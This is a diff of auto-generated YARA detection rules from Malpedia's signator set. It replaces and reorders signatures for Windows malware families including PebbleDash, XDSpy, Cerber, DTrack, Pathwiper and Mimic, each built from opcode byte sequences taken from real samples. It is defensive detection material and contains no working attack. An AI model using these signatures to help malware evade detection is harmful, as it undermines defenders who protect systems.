+		id = "e5b2e91f-ba86-5aee-a150-1a0e9285e25b"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.winsloader"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.winsloader_auto.yar#L1-L171"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.pebbledash"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.pebbledash_auto.yar#L1-L181"
 		license_url = "N/A"
-		logic_hash = "b2fd64965251990b571c8a72ebd9a6faa4e5fa165dfd7a3b0d129cdd9946e8f7"
+		logic_hash = "e36d4a9a300e40c4a3570c6f2230ff5d0e8e8c772444b2ae33bda786b301ae99"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -92335,38 +92512,38 @@ rule MALPEDIA_Win_Winsloader_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 83c40c a4 ffd0 5b 5f }
-		$sequence_1 = { 83c434 85ff 7510 56 e8???????? 83c404 33c0 }
-		$sequence_2 = { 8d5c3304 e8???????? 8b0d???????? 8b15???????? 6689841dfcfbffff }
-		$sequence_3 = { b8???????? 83c40c 66c7843500fcfffff90b 8d4801 8d4900 }
-		$sequence_4 = { 75f9 2bc1 0fb6f8 888435fefbffff 8d4701 50 }
-		$sequence_5 = { 8d44020c 0fb6f9 66898435fefbffff 888c3500fcffff 8d4f01 51 8d943501fcffff }
-		$sequence_6 = { 50 e8???????? 68???????? 8d5c3304 }
-		$sequence_7 = { 83c40c 03f7 b8???????? 66c78435fcfbffff9001 8d4801 8a10 40 }
-		$sequence_8 = { 83c40c 6800040000 8d8dfcf7ffff 51 }
-		$sequence_9 = { 8d8dfcf7ffff e8???????? 85c0 7507 33c0 }
-		$sequence_10 = { 894df0 8b34cdb86a0110 8b4d08 6a5a 2bce 5b }
-		$sequence_11 = { 7466 40 68???????? 50 e8???????? 83c408 }
-		$sequence_12 = { 57 8db8b0c20110 57 ff15???????? ff0d???????? }
-		$sequence_13 = { 8b85f8f3ffff c68405fcfbffff0b 8b8df8f3ffff 83c101 898df8f3ffff }
-		$sequence_14 = { 0f84ee020000 66660f1f840000000000 81f900010000 0f8587000000 8bce }
-		$sequence_15 = { 1bc0 23c1 83c008 5d c3 8b04c50c480110 5d }
+		$sequence_0 = { 50 b9???????? e8???????? 85c0 7514 }
+		$sequence_1 = { 5e c3 55 8b6c2408 56 33f6 8b4d00 }
+		$sequence_2 = { e8???????? 6888130000 ff15???????? b9???????? e8???????? 68???????? e8???????? }
+		$sequence_3 = { 832000 a1???????? a3???????? c3 8b442404 a3???????? }
+		$sequence_4 = { 5b 5e 5f c9 c3 6a01 ff742408 }
+		$sequence_5 = { e8???????? 33d2 b90e000000 f7f1 }
+		$sequence_6 = { 6829080000 68???????? 68???????? e8???????? }
+		$sequence_7 = { 5e c3 55 8bec 833d????????00 750f }
+		$sequence_8 = { 41894e04 0fb64209 0fb64a08 c1e108 0bc8 0fb6420a c1e108 }
+		$sequence_9 = { 4c8bf1 488bf1 85c0 bd01000000 0f44c5 41c1e008 8905???????? }
+		$sequence_10 = { c1e108 0bc8 0fb6420b c1e108 0bc8 41894e08 0fb6420d }
+		$sequence_11 = { 0fb64201 4c8db100010000 0fb63a 4c8d258fdaffff 440fb65a04 4d8be8 440fb64a08 }
+		$sequence_12 = { 66420f6e4ccb10 4b8d0c5b 660f6e5ccb10 4183c308 4c8d0440 66420f6e54c310 8d47ff }
+		$sequence_13 = { 41c1e008 8905???????? 0fb64201 440bc0 0fb64202 41c1e008 }
+		$sequence_14 = { 415e 415d 415c 5d c3 498bcc e8???????? }
+		$sequence_15 = { e8???????? 488b0d???????? 33d2 ffd0 85c0 }
 
 	condition:
-		7 of them and filesize < 270336
+		7 of them and filesize < 677888
 }
-rule MALPEDIA_Win_Godzilla_Loader_Auto : FILE
+rule MALPEDIA_Win_Shortleash_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "be70f5e8-f454-5cf5-9a53-9b79088ce98e"
+		id = "b69c5abe-5ff2-5cda-b15d-4ffaeea772b2"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.godzilla_loader"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.godzilla_loader_auto.yar#L1-L118"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.shortleash"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.shortleash_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "192fb36ce99cb3fd5c305739a3550413e1aac5f25669dd240cdac235353c820b"
+		logic_hash = "7625917da117618d50239e800ec3508d722326f3509a4fb7631eb7833bd5c208"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -92380,32 +92557,32 @@ rule MALPEDIA_Win_Godzilla_Loader_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 56 57 ff7508 ff15???????? 8bf0 56 }
-		$sequence_1 = { 8d45fc 50 57 6a01 56 ff7508 }
-		$sequence_2 = { 6a00 8bf8 8d45fc 50 57 6a01 56 }
-		$sequence_3 = { 6a01 56 ff7508 8975fc }
-		$sequence_4 = { 53 53 53 6800000088 }
-		$sequence_5 = { a5 ff512c 85c0 756c }
-		$sequence_6 = { a5 50 a5 ff512c 85c0 756c }
-		$sequence_7 = { 8b08 50 ff11 85c0 7527 }
-		$sequence_8 = { 8bec 51 56 57 ff7508 ff15???????? 8bf0 }
-		$sequence_9 = { 53 53 53 53 6800000088 }
+		$sequence_0 = { ff10 83c8ff f00fc1430c 83f801 750c 488b4c2450 488b01 }
+		$sequence_1 = { e9???????? 4055 4883ec20 488bea ba90000000 488b4d30 e8???????? }
+		$sequence_2 = { f30f7f4de8 4533f6 4c8975f8 418d4e10 e8???????? 488bd8 488d45d8 }
+		$sequence_3 = { e9???????? 488d15d5580200 488bcf e8???????? 85c0 7504 488d7706 }
+		$sequence_4 = { e8???????? 488bd0 488d4c2440 e8???????? 90 488b8eb0000000 e8???????? }
+		$sequence_5 = { eb09 4c394810 7453 488b00 493b00 75f2 4d8b00 }
+		$sequence_6 = { b910000000 e8???????? 488906 488d0d0e020000 488d1533090000 48895308 48890b }
+		$sequence_7 = { ff15???????? 488b542458 488bcb e8???????? 488b542450 488d4b08 e8???????? }
+		$sequence_8 = { e8???????? 8bf0 85c0 0f8548010000 488b4530 4c8d8348010000 482b8390000000 }
+		$sequence_9 = { ff15???????? 4839b3a8000000 7442 488bcb e8???????? 488b8ba8000000 e8???????? }
 
 	condition:
-		7 of them and filesize < 155648
+		7 of them and filesize < 2415616
 }
-rule MALPEDIA_Win_Gotohttp_Auto : FILE
+rule MALPEDIA_Win_Xdspy_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "7d06cfe0-00c5-5a49-9ea7-3f35cccfbcba"
+		id = "54110d73-619a-59d4-a80b-7be8436504a7"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.gotohttp"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.gotohttp_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.xdspy"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.xdspy_auto.yar#L1-L174"
 		license_url = "N/A"
-		logic_hash = "eca21e603241e81fa8edd82e734587340b272e9a197c8dfdde2af1790f4487f3"
+		logic_hash = "6256dc971ecf3bb6744674fefad5e90a83cd8cf7acf2f0addd47bba093a56e7a"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -92419,34 +92596,40 @@ rule MALPEDIA_Win_Gotohttp_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { eb46 41f6401001 7412 0fb64c2428 ba01000000 66d3e2 66412350f8 }
-		$sequence_1 = { f30f590d???????? f30f5905???????? f30f58cc f30f58c4 f30f59c8 730a f30f1005???????? }
-		$sequence_2 = { eb05 ffc0 894334 488bcb e8???????? 488bcb 4c8bf8 }
-		$sequence_3 = { 89442454 488bd3 33c9 ff15???????? 488b87e0030000 8b4860 8d0c8d01000000 }
-		$sequence_4 = { e8???????? 488bf8 4885c0 7445 488d5010 488910 4863c5 }
-		$sequence_5 = { 83fb02 0f85ee010000 4585ed 741d 448b4d5c 488b9590000000 488b4d40 }
-		$sequence_6 = { e9???????? b920000000 e8???????? 488bd8 4885c0 741a 48897008 }
-		$sequence_7 = { ff5010 488d4b18 ff15???????? c7430800000000 40f6c601 7408 488bcb }
-		$sequence_8 = { eba3 488b8c2480000000 4881c150050000 488b842480000000 48898888000000 488b8c2480000000 488b842480000000 }
-		$sequence_9 = { eb17 41389efb020000 751f c64705c2 bb02000000 4885f6 7411 }
+		$sequence_0 = { 8d85b0510000 50 e8???????? 8d85b0510000 50 897da4 }
+		$sequence_1 = { 5e e8???????? c9 c3 53 56 68???????? }
+		$sequence_2 = { e8???????? 8d851cd1ffff 50 e8???????? ff35???????? 8d851cd1ffff 50 }
+		$sequence_3 = { 89459c ff15???????? 85c0 7413 ff15???????? 3db7000000 7506 }
+		$sequence_4 = { 56 8bf8 e8???????? 83c410 8bd8 85ff }
+		$sequence_5 = { 85f6 0f84ba000000 8975e0 8b04bd804e4100 0500080000 3bf0 }
+		$sequence_6 = { c3 8bff 56 57 33ff 8db730074100 }
+		$sequence_7 = { e8???????? 68ff000000 e8???????? 59 59 8b7508 8d34f548044100 }
+		$sequence_8 = { 0f8514010000 83fb01 0f850b010000 e8???????? 488d8dc0130000 ff15???????? }
+		$sequence_9 = { 88840d80070000 488d4901 84c0 75e8 80bd8007000000 488d8580070000 }
+		$sequence_10 = { 48898424c0000000 4889bc24c8000000 488d8c2480000000 ff15???????? }
+		$sequence_11 = { 4983e801 75ea b801000000 8d501f 6690 }
+		$sequence_12 = { 880413 48ffc3 4883fb0e 7cea }
+		$sequence_13 = { 75e8 488bcb 0f1f440000 420fb684399c941700 }
+		$sequence_14 = { 7413 0f1f840000000000 fe08 488d4001 403838 75f5 }
+		$sequence_15 = { e8???????? 488b05???????? 488d15853a0100 488bcb 83e13f }
 
 	condition:
-		7 of them and filesize < 6266704
+		7 of them and filesize < 3244032
 }
-rule MALPEDIA_Win_Op_Blockbuster_Auto : FILE
+rule MALPEDIA_Win_Unidentified_003_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "3b7f0c30-0206-5506-9bf8-8eb817cff417"
+		id = "d98d47b0-9a51-53ac-b838-c109a79a3c60"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.op_blockbuster"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.op_blockbuster_auto.yar#L1-L322"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_003"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.unidentified_003_auto.yar#L1-L129"
 		license_url = "N/A"
-		logic_hash = "ef3bbaff4dfd2be69511dd31c3bf7441917e62af8119f46abb34c10cb6a977e8"
+		logic_hash = "a77ee5178781b22b88b059404b849af3a08c098d4327a0118f9c2d73b7bfb28c"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -92458,56 +92641,32 @@ rule MALPEDIA_Win_Op_Blockbuster_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { c701???????? 8b497c 85c9 7407 51 }
-		$sequence_1 = { 57 683c400000 6a40 ff15???????? }
-		$sequence_2 = { e8???????? 85c0 7407 83f802 }
-		$sequence_3 = { ff15???????? 6808400000 6a40 ff15???????? }
-		$sequence_4 = { 56 e8???????? 68???????? 56 a3???????? e8???????? 83c440 }
-		$sequence_5 = { f3ab 66ab aa 5f 85f6 5e }
-		$sequence_6 = { 8a08 80f920 7505 83c021 }
-		$sequence_7 = { 8d45fc 6a04 50 57 ff15???????? }
-		$sequence_8 = { 85c0 7412 68???????? 50 e8???????? 59 a3???????? }
-		$sequence_9 = { 56 50 8d45fc 6a04 }
-		$sequence_10 = { 3c70 7f04 0409 eb06 }
-		$sequence_11 = { 3c69 7c08 3c70 7f04 }
-		$sequence_12 = { 8bf0 ff15???????? 85f6 7404 85c0 }
-		$sequence_13 = { 4863c1 48ffc7 448bc2 88940460010000 0fb607 84c0 }
-		$sequence_14 = { 33c0 8bf8 488d8dd0020000 4863df ff15???????? 488d4c3302 488d95d0020000 }
-		$sequence_15 = { a3???????? 5e c3 68???????? ff15???????? 85c0 7412 }
-		$sequence_16 = { 57 e8???????? 56 e8???????? 83c414 b801000000 }
-		$sequence_17 = { 666666660f1f840000000000 0fb603 48ffc3 884419ff 84c0 75f2 488d9580010000 }
-		$sequence_18 = { 488d8d11010000 33d2 41b803010000 c6851001000000 e8???????? 4533e4 488d542460 }
-		$sequence_19 = { 8bc6 5f 5e c3 33c0 6a00 }
-		$sequence_20 = { 6a00 ff15???????? 8bf8 85ff 7504 5f 5e }
-		$sequence_21 = { 89442440 888424c0020000 e8???????? 488d9424c0020000 }
-		$sequence_22 = { c3 56 53 6a01 57 e8???????? }
-		$sequence_23 = { c3 33c0 ebf8 53 33db 391d???????? 56 }
-		$sequence_24 = { 0fb607 48ffc1 84c0 75ea 803f20 740a }
-		$sequence_25 = { 68???????? 56 e8???????? 56 e8???????? 83c438 }
-		$sequence_26 = { 897de0 394508 7c1f 3934bdd8974400 }
-		$sequence_27 = { 83e03f c1ff06 6bd830 8b04bdd8974400 f644032801 }
-		$sequence_28 = { 6bc830 8b0495d8974400 8b440818 83f8ff 7409 83f8fe 7404 }
-		$sequence_29 = { 50 68???????? 6a05 8d856cffffff 57 50 }
-		$sequence_30 = { 8bcb 8d84240c0c0000 83e103 50 }
-		$sequence_31 = { c745d403000000 8975d8 8b08 52 }
-		$sequence_32 = { 8d85e0fdffff d1fe 4e 56 50 }
-		$sequence_33 = { e8???????? 6800040000 56 ff742414 ff15???????? 5f }
+		$sequence_0 = { b8???????? 2b05???????? ff7006 50 50 8d442464 50 }
+		$sequence_1 = { 7561 6a00 68???????? 8d45f0 e8???????? }
+		$sequence_2 = { 0f8312020000 8dbdf1fdffff 2bf9 8a11 88140f 41 84d2 }
+		$sequence_3 = { 85c0 75b5 8d45f4 50 8d85e3fbffff 50 }
+		$sequence_4 = { 395de0 0f8421010000 8b45e0 8b08 50 }
+		$sequence_5 = { bb01000080 53 ff15???????? 6a22 58 668985f0fbffff 33c0 }
+		$sequence_6 = { 3bc3 7468 3d00100400 741c 3d10100400 7415 3d00100600 }
+		$sequence_7 = { ff45fc 8b45fc 8145f80c020000 81c718040000 3b45f0 0f8238ffffff eb07 }
+		$sequence_8 = { 8b45a4 3bc3 7464 8945d8 33c0 8d7dac ab }
+		$sequence_9 = { 56 e8???????? 59 59 85c0 7408 c60000 }
 
 	condition:
-		7 of them and filesize < 74309632
+		7 of them and filesize < 57344
 }
-rule MALPEDIA_Win_Btcware_Auto : FILE
+rule MALPEDIA_Win_Gotohttp_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "fb79124d-5478-5d65-bb0b-b2f45f8507ae"
+		id = "7d06cfe0-00c5-5a49-9ea7-3f35cccfbcba"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.btcware"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.btcware_auto.yar#L1-L122"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.gotohttp"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.gotohttp_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "953afc4c0f32ce8172077704d80fd52c7aee0d584b7d86a36e176eb1e7df5fbe"
+		logic_hash = "eca21e603241e81fa8edd82e734587340b272e9a197c8dfdde2af1790f4487f3"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -92521,71 +92680,71 @@ rule MALPEDIA_Win_Btcware_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8d85f4faffff 68???????? 50 ffd6 83c418 8d85f0faffff 50 }
-		$sequence_1 = { 8b4610 c6040800 83ff03 7ca9 8b7dd8 33db }
-		$sequence_2 = { e8???????? 8904bd40d04100 85c0 7514 }
-		$sequence_3 = { 6888d38101 68???????? 6a00 ffd3 33d2 }
-		$sequence_4 = { 50 ffb5a0d7ffff ff15???????? 85c0 0f8518feffff }
-		$sequence_5 = { 5d c3 55 8bec 83e4f8 b81c820000 }
-		$sequence_6 = { b880fd8101 c3 b87cfd8101 c3 53 56 }
-		$sequence_7 = { 897df4 3bfb 0f8e6fffffff 83c8ff eb07 8b04cdc42f4100 5f }
-		$sequence_8 = { c78564ffffff0f000000 c68550ffffff00 83f810 7245 8b8d38ffffff }
-		$sequence_9 = { 8945e0 8d8058c54100 8945e4 803800 8bc8 7435 8a4101 }
+		$sequence_0 = { eb46 41f6401001 7412 0fb64c2428 ba01000000 66d3e2 66412350f8 }
+		$sequence_1 = { f30f590d???????? f30f5905???????? f30f58cc f30f58c4 f30f59c8 730a f30f1005???????? }
+		$sequence_2 = { eb05 ffc0 894334 488bcb e8???????? 488bcb 4c8bf8 }
+		$sequence_3 = { 89442454 488bd3 33c9 ff15???????? 488b87e0030000 8b4860 8d0c8d01000000 }
+		$sequence_4 = { e8???????? 488bf8 4885c0 7445 488d5010 488910 4863c5 }
+		$sequence_5 = { 83fb02 0f85ee010000 4585ed 741d 448b4d5c 488b9590000000 488b4d40 }
+		$sequence_6 = { e9???????? b920000000 e8???????? 488bd8 4885c0 741a 48897008 }
+		$sequence_7 = { ff5010 488d4b18 ff15???????? c7430800000000 40f6c601 7408 488bcb }
+		$sequence_8 = { eba3 488b8c2480000000 4881c150050000 488b842480000000 48898888000000 488b8c2480000000 488b842480000000 }
+		$sequence_9 = { eb17 41389efb020000 751f c64705c2 bb02000000 4885f6 7411 }
 
 	condition:
-		7 of them and filesize < 458752
+		7 of them and filesize < 6266704
 }
-rule MALPEDIA_Win_Pathwiper_Auto : FILE
+rule MALPEDIA_Win_Unidentified_063_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "a6716c11-1f14-5a04-8fe4-1682b0bebda9"
-		date = "2026-01-05"
-		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.pathwiper"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.pathwiper_auto.yar#L1-L133"
+		id = "d22cba4e-b95b-5578-ac95-09534bd7dc14"
+		date = "2022-11-21"
+		modified = "2022-11-25"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_063"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.unidentified_063_auto.yar#L1-L124"
 		license_url = "N/A"
-		logic_hash = "2875d616150343a511e4ca1c06e26bab19bffb8a61f2efbef223956f6da2a004"
+		logic_hash = "14c180eecdf0e6fbf2b936d6c444ad58c2e649e1fa770106e8719057ee1aefbd"
 		score = 75
 		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
 		signator_config = "callsandjumps;datarefs;binvalue"
-		malpedia_rule_date = "20260105"
-		malpedia_hash = "19b79e7cab4eaf532122e5b45a77dd8f6bb5cc79"
-		malpedia_version = "20251219"
+		malpedia_rule_date = "20221118"
+		malpedia_hash = "e0702e2e6d1d00da65c8a29a4ebacd0a4c59e1af"
+		malpedia_version = "20221125"
 		malpedia_license = "CC BY-SA 4.0"
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { c78540ffffff00000000 c78544ffffff0f000000 c68530ffffff00 8d8d88ebffff e8???????? 8bf8 6a00 }
-		$sequence_1 = { 84c0 0f84a8000000 807d3400 0f849e000000 8b950cfeffff 8b8d04feffff 8d4201 }
-		$sequence_2 = { 8845eb 8bc1 f7e6 6a00 68ffffff7f 52 50 }
-		$sequence_3 = { 8bf8 eb02 33ff 8b8518feffff 40 897dc0 50 }
-		$sequence_4 = { c645fc8a 50 8d8df3efffff e8???????? 8d85acf8ffff c645fc8b 50 }
-		$sequence_5 = { 3bf8 0f84f2010000 83c704 0f1f00 6a00 8d850cffffff 8bcf }
-		$sequence_6 = { e8???????? 83c408 83c718 3bbd48feffff 0f85c2feffff 8d8554feffff 898528feffff }
-		$sequence_7 = { 660fd68504f0ffff c785f4efffff3734d6f2 0f1f440000 8a443dd0 32c1 88843df8efffff }
-		$sequence_8 = { 2b85bcf6ffff 8985d8f6ffff 0f8559fcffff 8b8db8f6ffff 85c9 7445 8b3c8d7c2d4600 }
-		$sequence_9 = { 8b7508 8d45f4 683734daf3 50 8d45e0 8975ec 50 }
+		$sequence_0 = { 8d43cf 83f819 770c 6689b550030000 e9???????? }
+		$sequence_1 = { 7363 488bf3 4c8d35dfc40100 83e63f 488beb 48c1fd06 48c1e606 }
+		$sequence_2 = { e8???????? 4863f8 488d3588800100 488bcb }
+		$sequence_3 = { 0f11442478 4c8b4708 488d442470 493bc0 7362 488b07 488d4c2470 }
+		$sequence_4 = { 4885c9 7407 48ff25???????? c3 48894c2408 57 4883ec50 }
+		$sequence_5 = { 83f801 7518 488b0d???????? 488d05bf5f0100 483bc8 7405 e8???????? }
+		$sequence_6 = { 8b8c96d0cd0200 8b534c 33c8 0fb6c1 }
+		$sequence_7 = { 0f84e7000000 488b0e 483bc8 740e 4885c9 7406 }
+		$sequence_8 = { 498bc2 418be9 48c1f806 488d0d708c0100 4183e23f 4903e8 }
+		$sequence_9 = { 488d158a5a0200 488bcb e8???????? 85c0 7499 488d157f5a0200 488bcb }
 
 	condition:
-		7 of them and filesize < 1047552
+		7 of them and filesize < 475136
 }
-rule MALPEDIA_Win_Dtrack_Auto : FILE
+rule MALPEDIA_Win_Gooseegg_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "a8e0795f-f37a-570e-a2d0-586d485922bb"
+		id = "d8132454-9f6e-5d45-ae4a-e06046e4b7c3"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.dtrack"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.dtrack_auto.yar#L1-L159"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.gooseegg"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.gooseegg_auto.yar#L1-L120"
 		license_url = "N/A"
-		logic_hash = "6b14b7e6495b7f7e349f91bcaae4aa222786469ac0195332831e5ef10b7a534f"
+		logic_hash = "8983b8f0c526551207a00c2d480777794912cb3a61999ef4b05b249edd7a0003"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -92599,37 +92758,32 @@ rule MALPEDIA_Win_Dtrack_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 52 8b4508 50 e8???????? 83c414 8b4d10 51 }
-		$sequence_1 = { 50 8d8dccfdffff 51 6a00 8d95b0faffff 52 }
-		$sequence_2 = { 8b4df8 c1e902 334df8 8b55f8 c1ea03 33ca }
-		$sequence_3 = { 33ca 8b55f8 c1ea07 33ca c1e118 }
-		$sequence_4 = { 50 e8???????? 83c40c c685b8fbffff00 }
-		$sequence_5 = { 8b88fc180000 8b5508 8b4508 8b8008100000 89848a04100000 8b4d0c }
-		$sequence_6 = { 8d959efaffff 52 e8???????? 83c410 8d85d4faffff 898528f6ffff }
-		$sequence_7 = { e8???????? 83c410 c68587f6ffff00 8b15???????? 52 }
-		$sequence_8 = { eb64 8b4d10 51 6a00 }
-		$sequence_9 = { 8b08 894dfc 8b550c 8b4204 8945f8 68efcdab89 }
-		$sequence_10 = { c1e217 0bca 894d14 8b45f8 }
-		$sequence_11 = { 6a00 8b55f4 52 e8???????? 83c40c 8b450c 8b08 }
-		$sequence_12 = { 0bc1 894518 8b5514 8955f8 }
-		$sequence_13 = { 8b4df8 c1e908 234df8 8b45f8 c1e810 23c8 }
-		$sequence_14 = { 8b4df0 3b4d10 0f8d90000000 8b5508 }
+		$sequence_0 = { 4d85c9 488d3d797c0000 488bc2 4c8bfa 4d0f45d1 4885d2 418d6b01 }
+		$sequence_1 = { 488d05f1550100 c3 488d05f1550100 c3 4883ec28 e8???????? }
+		$sequence_2 = { eb02 33db 4c8d357194ffff 4885db }
+		$sequence_3 = { ff15???????? 48832300 4883c308 488d05b9440100 483bd8 }
+		$sequence_4 = { 488d35abe70000 48895c2420 488d056fff0000 483bd8 7419 483933 740e }
+		$sequence_5 = { 488b05???????? 488d150ef7ffff 483bc2 7423 65488b042530000000 }
+		$sequence_6 = { 4c8d0dd17b0000 33c9 4c8d05c47b0000 488d15c57b0000 e8???????? 4885c0 740b }
+		$sequence_7 = { 488945e0 895128 488d0dbb940000 488b45d8 488908 488d0d0d190100 488b45d8 }
+		$sequence_8 = { 8bfb e9???????? e8???????? 488d1df2370100 }
+		$sequence_9 = { 85c0 0f849e000000 4c8d051f330100 ba00020000 }
 
 	condition:
-		7 of them and filesize < 1736704
+		7 of them and filesize < 217088
 }
-rule MALPEDIA_Win_Cerber_Auto : FILE
+rule MALPEDIA_Win_Mimic_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "4c9d39f2-1f37-54c9-9401-1cacb9319069"
+		id = "a8de2e30-a540-5075-b183-0c7273ee4c55"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cerber"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.cerber_auto.yar#L1-L121"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mimic"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.mimic_auto.yar#L1-L133"
 		license_url = "N/A"
-		logic_hash = "b9dc28e7f8f56d5aa5c92d6f0da2514b7004d6b05c357e6e1f8548cb64132bf7"
+		logic_hash = "1c66a1ded66595b3251cf8ee2e17251126ee2cc563185ec6b8bc5f5c9095e6bc"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -92643,32 +92797,32 @@ rule MALPEDIA_Win_Cerber_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8345fc04 8901 ff45f8 8b45f8 }
-		$sequence_1 = { 8b5508 2bd7 8955f4 8975fc }
-		$sequence_2 = { 59 84c0 7413 8b450c 56 ff7508 8b7510 }
-		$sequence_3 = { 833c8100 7505 85c0 75f1 c3 40 }
-		$sequence_4 = { 8b550c 8b4510 b900100000 2b8e7c3b0000 33db 2b55fc 1bc3 }
-		$sequence_5 = { 7709 39450c 0f86dc000000 8b550c 8b4510 }
-		$sequence_6 = { 6a00 50 e8???????? 8b4df0 83c40c 85c9 7e58 }
-		$sequence_7 = { 7433 8b7d0c 8b5508 2bd7 8955f4 8975fc }
-		$sequence_8 = { 762e 85d2 7838 8b4508 8b04b8 83651400 837d1420 }
-		$sequence_9 = { 3b7d0c 72d2 85d2 780a }
+		$sequence_0 = { 52 51 50 ff36 ff15???????? 85c0 0f84a30a0000 }
+		$sequence_1 = { 0fb6c3 8b5f30 330c8508fa5b00 8d0411 8b542420 33d0 8b442410 }
+		$sequence_2 = { 898554feffff 85c9 7436 8b9534feffff 8bc1 2bd1 81fa00100000 }
+		$sequence_3 = { 83c40c 56 ff15???????? e9???????? 52 51 }
+		$sequence_4 = { a0???????? 83ec0c 84c0 7404 8be5 5d c3 }
+		$sequence_5 = { ff15???????? 8b460c ff748604 ff15???????? 837e4800 7440 0f1f8000000000 }
+		$sequence_6 = { 3d???????? 740d 8bc8 e8???????? 8b0d???????? 8b5104 8b82f4d55e00 }
+		$sequence_7 = { 8d85b4f9ffff 50 56 ffd7 85c0 746c 8b8db8f9ffff }
+		$sequence_8 = { 50 51 8d8de0feffff e8???????? 6a18 68???????? 51 }
+		$sequence_9 = { ff75b8 0f4345a8 50 e8???????? 33c9 0f1000 0f11854cffffff }
 
 	condition:
-		7 of them and filesize < 573440
+		7 of them and filesize < 4204544
 }
